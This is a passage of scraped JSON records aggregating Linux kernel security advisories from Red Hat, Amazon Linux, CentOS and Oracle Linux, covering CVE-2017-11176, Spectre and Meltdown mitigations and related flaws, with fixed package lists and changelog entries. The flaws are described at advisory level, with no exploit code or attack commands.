"2018-06-07T18:14:51", "published": "2017-10-19T17:10:34", "id": "RHSA-2017:2918", "href": "https://access.redhat.com/errata/RHSA-2017:2918", "type": "redhat", "title": "(RHSA-2017:2918) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-15265", "CVE-2017-8824"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824)\n\n* kernel: Use-after-free in sys_mq_notify() (CVE-2017-11176)\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting CVE-2017-8824.\n\nBug Fix(es):\n\n* Previously, on certain Intel 64 systems, the microcode contained a new model-specific register (MSR) that was not present in the older microcode running on CPUs that had not been updated yet. As a consequence, the system crashed due to a general protection fault on a CPU running the older microcode. This update fixes the bug by having the kernel use MSR access routines that handle the general protection fault. As a result, the system no longer crashes in the described scenario. (BZ#1651481)", "modified": "2018-12-12T19:24:59", "published": "2018-12-12T19:23:50", "id": "RHSA-2018:3822", "href": "https://access.redhat.com/errata/RHSA-2018:3822", "type": "redhat", "title": "(RHSA-2018:3822) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-7542", "CVE-2017-9074"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An integer overflow vulnerability in ip6_find_1stfragopt() function was found. A local attacker that has privileges (of CAP_NET_RAW) to open raw socket can cause an infinite loop inside the ip6_find_1stfragopt() function. (CVE-2017-7542, Moderate)\n\n* The IPv6 fragmentation implementation in the Linux kernel does not consider that the nexthdr field may be associated with an invalid option, which allows local users to cause a denial of service (out-of-bounds read and BUG) or possibly have unspecified other impact via crafted socket and send system calls. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely. (CVE-2017-9074, Moderate)\n\n* A use-after-free flaw was found in the Netlink functionality of the Linux kernel networking subsystem. Due to the insufficient cleanup in the mq_notify function, a local attacker could potentially use this flaw to escalate their privileges on the system. (CVE-2017-11176, Moderate)\n\nBug Fix(es):\n\n* Previously, the default timeout and retry settings in the VMBus driver were insufficient in some cases, for example when a Hyper-V host was under a significant load. Consequently, in Windows Server 2016, Hyper-V Server 2016, and Windows Azure Platform, when running a Red Hat Enterprise Linux Guest on the Hyper-V hypervisor, the guest failed to boot or booted with certain Hyper-V devices missing. This update alters the timeout and retry settings in VMBus, and Red Hat Enterprise Linux guests now boot as expected under the described conditions. (BZ#1506145)\n\n* Previously, an incorrect external declaration in the be2iscsi driver caused a kernel panic when using the systool utility. With this update, the external declaration in be2iscsi has been fixed, and the kernel no longer panics when using systool. (BZ#1507512)\n\n* Under high usage of the NFSD file system and memory pressure, if many tasks in the Linux kernel attempted to obtain the global spinlock to clean the Duplicate Reply Cache (DRC), these tasks stayed in an active wait in the nfsd_reply_cache_shrink() function for up to 99% of time. Consequently, a high load average occurred. This update fixes the bug by separating the DRC in several parts, each with an independent spinlock. As a result, the load and CPU utilization is no longer excessive under the described circumstances. (BZ#1509876)\n\n* When attempting to attach multiple SCSI devices simultaneously, Red Hat Enterprise Linux 6.9 on IBM z Systems sometimes became unresponsive. This update fixes the zfcp device driver, and attaching multiple SCSI devices simultaneously now works as expected in the described scenario. (BZ#1512425)\n\n* On IBM z Systems, the tiqdio_call_inq_handlers() function in the Linux kernel incorrectly cleared the device state change indicator (DSCI) for the af_iucv devices using the HiperSockets transport with multiple input queues. Consequently, queue stalls on such devices occasionally occurred. With this update, tiqdio_call_inq_handlers() has been fixed to clear the DSCI only once, prior to scanning the queues. As a result, queue stalls for af_iucv devices using the HiperSockets transport no longer occur under the described circumstances. (BZ#1513314)\n\n* Previously, small data chunks caused the Stream Control Transmission Protocol (SCTP) to account the receiver_window (rwnd) values incorrectly when recovering from a \"zero-window situation\". As a consequence, window updates were not sent to the peer, and an artificial growth of rwnd could lead to packet drops. This update properly accounts such small data chunks and ignores the rwnd pressure values when reopening a window. As a result, window updates are now sent, and the announced rwnd reflects better the real state of the receive buffer. (BZ#1514443)", "modified": "2018-06-07T18:22:25", "published": "2018-01-25T15:07:07", "id": "RHSA-2018:0169", "href": "https://access.redhat.com/errata/RHSA-2018:0169", "type": "redhat", "title": "(RHSA-2018:0169) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000111", "CVE-2017-1000112"], "description": "**Issue Overview:**\n\nExploitable memory corruption due to UFO to non-UFO path switch ([CVE-2017-1000112 __](<https://access.redhat.com/security/cve/CVE-2017-1000112>))\n\nheap out-of-bounds in AF_PACKET sockets ([CVE-2017-1000111 __](<https://access.redhat.com/security/cve/CVE-2017-1000111>))\n\nThe mq_notify function in the Linux kernel does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to possibly cause a situation where a value may be used after being freed (use-after-free) which may lead to memory corruption or other unspecified other impact. ([CVE-2017-11176 __](<https://access.redhat.com/security/cve/CVE-2017-11176>) )\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-4.9.38-16.35.amzn1.i686 \n kernel-tools-4.9.38-16.35.amzn1.i686 \n kernel-debuginfo-4.9.38-16.35.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.38-16.35.amzn1.i686 \n kernel-tools-devel-4.9.38-16.35.amzn1.i686 \n kernel-devel-4.9.38-16.35.amzn1.i686 \n kernel-4.9.38-16.35.amzn1.i686 \n perf-debuginfo-4.9.38-16.35.amzn1.i686 \n perf-4.9.38-16.35.amzn1.i686 \n kernel-headers-4.9.38-16.35.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.38-16.35.amzn1.noarch \n \n src: \n kernel-4.9.38-16.35.amzn1.src \n \n x86_64: \n perf-debuginfo-4.9.38-16.35.amzn1.x86_64 \n kernel-tools-4.9.38-16.35.amzn1.x86_64 \n perf-4.9.38-16.35.amzn1.x86_64 \n kernel-devel-4.9.38-16.35.amzn1.x86_64 \n kernel-tools-devel-4.9.38-16.35.amzn1.x86_64 \n kernel-headers-4.9.38-16.35.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.38-16.35.amzn1.x86_64 \n kernel-debuginfo-4.9.38-16.35.amzn1.x86_64 \n kernel-4.9.38-16.35.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.38-16.35.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2017-08-10T16:31:00", "published": "2017-08-10T16:31:00", "id": "ALAS-2017-868", "href": "https://alas.aws.amazon.com/ALAS-2017-868.html", "title": "Critical: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15274", "CVE-2017-14991", "CVE-2017-1000251", "CVE-2017-12192", "CVE-2017-14340", "CVE-2017-12154"], "description": "**Issue Overview:**\n\nstack buffer overflow in the native Bluetooth stack \nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. ([CVE-2017-1000251 __](<https://access.redhat.com/security/cve/CVE-2017-1000251>))\n\ndereferencing NULL payload with nonzero length \nA flaw was found in the implementation of associative arrays where the add_key systemcall and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. When accessing the payload within this length parameters value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops). ([CVE-2017-15274 __](<https://access.redhat.com/security/cve/CVE-2017-15274>))\n\nxfs: unprivileged user kernel oops \nA flaw was found where the XFS filesystem code mishandles a user-settable inode flag in the Linux kernel prior to 4.14-rc1. This can cause a local denial of service via a kernel panic.([CVE-2017-14340 __](<https://access.redhat.com/security/cve/CVE-2017-14340>))\n\nInformation leak in the scsi driver \nThe sg_ioctl() function in &#x27;drivers/scsi/sg.c&#x27; in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for &#x27;/dev/sg0&#x27;. ([CVE-2017-14991 __](<https://access.redhat.com/security/cve/CVE-2017-14991>))\n\nkvm: nVMX: L2 guest could access hardware(L0) CR8 register \nLinux kernel built with the KVM visualization support (CONFIG_KVM), with nested visualization (nVMX) feature enabled (nested=1), is vulnerable to a crash due to disabled external interrupts. As L2 guest could access (r/w) hardware CR8 register of the host(L0). In a nested visualization setup, L2 guest user could use this flaw to potentially crash the host(L0) resulting in DoS. ([CVE-2017-12154 __](<https://access.redhat.com/security/cve/CVE-2017-12154>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-headers-4.9.58-18.51.amzn1.i686 \n perf-4.9.58-18.51.amzn1.i686 \n perf-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-4.9.58-18.51.amzn1.i686 \n kernel-devel-4.9.58-18.51.amzn1.i686 \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-tools-4.9.58-18.51.amzn1.i686 \n kernel-tools-devel-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.58-18.51.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.58-18.51.amzn1.noarch \n \n src: \n kernel-4.9.58-18.51.amzn1.src \n \n x86_64: \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.58-18.51.amzn1.x86_64 \n kernel-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-4.9.58-18.51.amzn1.x86_64 \n perf-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-4.9.58-18.51.amzn1.x86_64 \n perf-4.9.58-18.51.amzn1.x86_64 \n kernel-headers-4.9.58-18.51.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2017-10-26T16:43:00", "published": "2017-10-26T16:43:00", "id": "ALAS-2017-914", "href": "https://alas.aws.amazon.com/ALAS-2017-914.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:39:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-9074", "CVE-2017-7542"], "description": "**CentOS Errata and Security Advisory** CESA-2018:0169\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An integer overflow vulnerability in ip6_find_1stfragopt() function was found. A local attacker that has privileges (of CAP_NET_RAW) to open raw socket can cause an infinite loop inside the ip6_find_1stfragopt() function. (CVE-2017-7542, Moderate)\n\n* The IPv6 fragmentation implementation in the Linux kernel does not consider that the nexthdr field may be associated with an invalid option, which allows local users to cause a denial of service (out-of-bounds read and BUG) or possibly have unspecified other impact via crafted socket and send system calls. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely. (CVE-2017-9074, Moderate)\n\n* A use-after-free flaw was found in the Netlink functionality of the Linux kernel networking subsystem. Due to the insufficient cleanup in the mq_notify function, a local attacker could potentially use this flaw to escalate their privileges on the system. (CVE-2017-11176, Moderate)\n\nBug Fix(es):\n\n* Previously, the default timeout and retry settings in the VMBus driver were insufficient in some cases, for example when a Hyper-V host was under a significant load. Consequently, in Windows Server 2016, Hyper-V Server 2016, and Windows Azure Platform, when running a Red Hat Enterprise Linux Guest on the Hyper-V hypervisor, the guest failed to boot or booted with certain Hyper-V devices missing. This update alters the timeout and retry settings in VMBus, and Red Hat Enterprise Linux guests now boot as expected under the described conditions. (BZ#1506145)\n\n* Previously, an incorrect external declaration in the be2iscsi driver caused a kernel panic when using the systool utility. With this update, the external declaration in be2iscsi has been fixed, and the kernel no longer panics when using systool. (BZ#1507512)\n\n* Under high usage of the NFSD file system and memory pressure, if many tasks in the Linux kernel attempted to obtain the global spinlock to clean the Duplicate Reply Cache (DRC), these tasks stayed in an active wait in the nfsd_reply_cache_shrink() function for up to 99% of time. Consequently, a high load average occurred. This update fixes the bug by separating the DRC in several parts, each with an independent spinlock. As a result, the load and CPU utilization is no longer excessive under the described circumstances. (BZ#1509876)\n\n* When attempting to attach multiple SCSI devices simultaneously, Red Hat Enterprise Linux 6.9 on IBM z Systems sometimes became unresponsive. This update fixes the zfcp device driver, and attaching multiple SCSI devices simultaneously now works as expected in the described scenario. (BZ#1512425)\n\n* On IBM z Systems, the tiqdio_call_inq_handlers() function in the Linux kernel incorrectly cleared the device state change indicator (DSCI) for the af_iucv devices using the HiperSockets transport with multiple input queues. Consequently, queue stalls on such devices occasionally occurred. With this update, tiqdio_call_inq_handlers() has been fixed to clear the DSCI only once, prior to scanning the queues. As a result, queue stalls for af_iucv devices using the HiperSockets transport no longer occur under the described circumstances. (BZ#1513314)\n\n* Previously, small data chunks caused the Stream Control Transmission Protocol (SCTP) to account the receiver_window (rwnd) values incorrectly when recovering from a \"zero-window situation\". As a consequence, window updates were not sent to the peer, and an artificial growth of rwnd could lead to packet drops. This update properly accounts such small data chunks and ignores the rwnd pressure values when reopening a window. As a result, window updates are now sent, and the announced rwnd reflects better the real state of the receive buffer. (BZ#1514443)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-January/034794.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\n", "edition": 5, "modified": "2018-01-31T11:35:03", "published": "2018-01-31T11:35:03", "id": "CESA-2018:0169", "href": "http://lists.centos.org/pipermail/centos-announce/2018-January/034794.html", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000111", "CVE-2017-7542"], "description": "kernel-uek\n[3.8.13-118.19.10]\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643556] {CVE-2017-11176}\n[3.8.13-118.19.9]\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011273] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 27002450] {CVE-2017-1000111}\n[3.8.13-118.19.8]\n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin Guay) [Orabug: 26883934] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26883934]", "edition": 5, "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "id": "ELSA-2017-3632", "href": "http://linux.oracle.com/errata/ELSA-2017-3632.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000111", "CVE-2017-7542"], "description": "[2.6.39-400.297.11]\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643562] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011278] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 27002453] {CVE-2017-1000111}\n[2.6.39-400.297.10]\n- mlx4_core: calculate log_mtt based on total system memory (Wei Lin Guay) [Orabug: 26867355] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26867355]", "edition": 6, "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "id": "ELSA-2017-3633", "href": "http://linux.oracle.com/errata/ELSA-2017-3633.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-9074", "CVE-2017-5715", "CVE-2017-7542"], "description": "[2.6.32-696.18.7.OL6]\n- Update genkey [bug 25599697]\n[2.6.32-696.18.7]\n- [x86] spec_ctrl: svm: spec_ctrl at vmexit needs per-cpu areas functional (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Eliminate redundnat FEATURE Not Present messages (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: enable IBRS and stuff_RSB before calling NMI C code (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: skip CAP_SYS_PTRACE check to skip audit (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: disable ibrs while in intel_idle() (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: skip IBRS/CR3 restore when paranoid exception returns to userland (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- Revert 'x86/entry: Use retpoline for syscall's indirect calls' (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/dump_pagetables: Allow dumping current pagetables (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/dump_pagetables: Add a pgd argument to walk_pgd_level() (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/dump_pagetables: Add page table directory (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Remove unneeded nmi_userspace code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Fix nmi exit code with CONFIG_TRACE_IRQFLAGS (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: init_tss is supposed to go in the PAGE_ALIGNED per-cpu section (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Clear kdump pgd page to prevent incorrect behavior (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: consider the init_mm.pgd a kaiser pgd (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: convert userland visible 'kpti' name to 'pti' (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n[2.6.32-696.18.6]\n- [x86] spec_ctrl: set IBRS during resume from RAM if ibrs_enabled is 2 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: __load_cr3 in resume from RAM after kernel %gs has been restored (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: Revert the __GFP_COMP flag change (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Fix paranoid_exit() trampoline clobber (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n[2.6.32-696.18.5]\n- [x86] spec_ctrl: allow use_ibp_disable only if both SPEC_CTRL and IBPB_SUPPORT are missing (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Documentation spec_ctrl.txt (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: remove irqs_disabled() check from intel_idle() (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use enum when setting ibrs/ibpb_enabled (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: undo speculation barrier for ibrs_enabled and noibrs_cmdline (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: introduce ibpb_enabled = 2 for IBPB instead of IBRS (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: introduce SPEC_CTRL_PCP_ONLY_IBPB (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: cleanup s/flush/sync/ naming when sending IPIs (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: set IBRS during CPU init if in ibrs_enabled == 2 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use IBRS_ENABLED instead of 1 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: allow the IBP disable feature to be toggled at runtime (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: always initialize save_reg in ENABLE_IBRS_SAVE_AND_CLOBBER (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: ibrs_enabled() is expected to return > 1 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: CLEAR_EXTRA_REGS and extra regs save/restore (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] syscall: Clear unused extra registers on syscall (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Add back STUFF_RSB to interrupt and error paths (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: make is_kaiser_pgd reliable (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: disable global pages by default with KAISER (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] revert: mm/kaiser: Disable global pages by default with KAISER (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: fix pgd freeing in error path (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Fix 32-bit program crash with 64-bit kernel on AMD boxes (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: reload spec_ctrl cpuid in all microcode load paths (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Prevent unwanted speculation without IBRS (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: add noibrs noibpb boot options (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Use retpoline for syscall's indirect calls (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] syscall: Clear unused extra registers on 32-bit compatible syscall entrance (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: rescan cpuid after a late microcode update (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: add debugfs ibrs_enabled ibpb_enabled (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: consolidate the spec control boot detection (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] Remove __cpuinitdata from some data & function (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] KVM/spec_ctrl: allow IBRS to stay enabled in host userland (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: move stuff_RSB in spec_ctrl.h (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Remove STUFF_RSB in error and interrupt code (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Stuff RSB for entry to kernel for non-SMEP platform (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm: Only set IBPB when the new thread cannot ptrace (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm: Set IBPB upon context switch (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] idle: Disable IBRS when offlining cpu and re-enable (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] idle: Disable IBRS entering idle and enable it on wakeup (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: implement spec ctrl C methods (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: save IBRS MSR value in save_paranoid for NMI (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] enter: Use IBRS on syscall and interrupts (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: swap rdx with rsi for nmi nesting detection (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: spec_ctrl_pcp and kaiser_enabled_pcp in same cachline (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use per-cpu knob instead of ALTERNATIVES for ibpb and ibrs (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] enter: MACROS to set/clear IBRS and set IBPB (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] x86: add SPEC_CTRL to MSR and CPUID lists (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] svm: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] svm: Set IBPB when running a different VCPU (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] vmx: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] vmx: Set IBPB when running a different VCPU (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] x86: clear registers on VM exit (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] [kvm] Pad RSB on VM transition (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [security] Add SPEC_CTRL Kconfig option (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpu/AMD: Control indirect branch predictor when SPEC_CTRL not available (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] feature: Report presence of IBPB and IBRS control (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] feature: Enable the x86 feature to control Speculation (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpuid: Provide get_scattered_cpuid_leaf() (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpuid: Cleanup cpuid_regs definitions (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] microcode: Share native MSR accessing variants (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] nop: Make the ASM_NOP* macros work from assembly (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpu: Clean up and unify the NOP selection infrastructure (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Further simplify the paranoid_exit code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Remove trampoline check from paranoid entry path (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Don't switch to trampoline stack in paranoid_exit (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Simplify trampoline stack restore code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [misc] locking/barriers: prevent speculative execution based on Coverity scan results (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [fs] udf: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [fs] prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [scsi] qla2xxx: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [netdrv] p54: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [netdrv] carl9170: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [media] uvcvideo: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] cpu/AMD: Remove now unused definition of MFENCE_RDTSC feature (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] cpu/AMD: Make the LFENCE instruction serialized (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [kernel] locking/barriers: introduce new memory barrier gmb() (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] Fix typo preventing msr_set/clear_bit from having an effect (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] Add another set of MSR accessor functions (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] mm/kaiser: Replace kaiser with kpti to sync with upstream (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map the trace idt tables in userland shadow pgd (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add 'kaiser' and 'nokaiser' boot options (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] 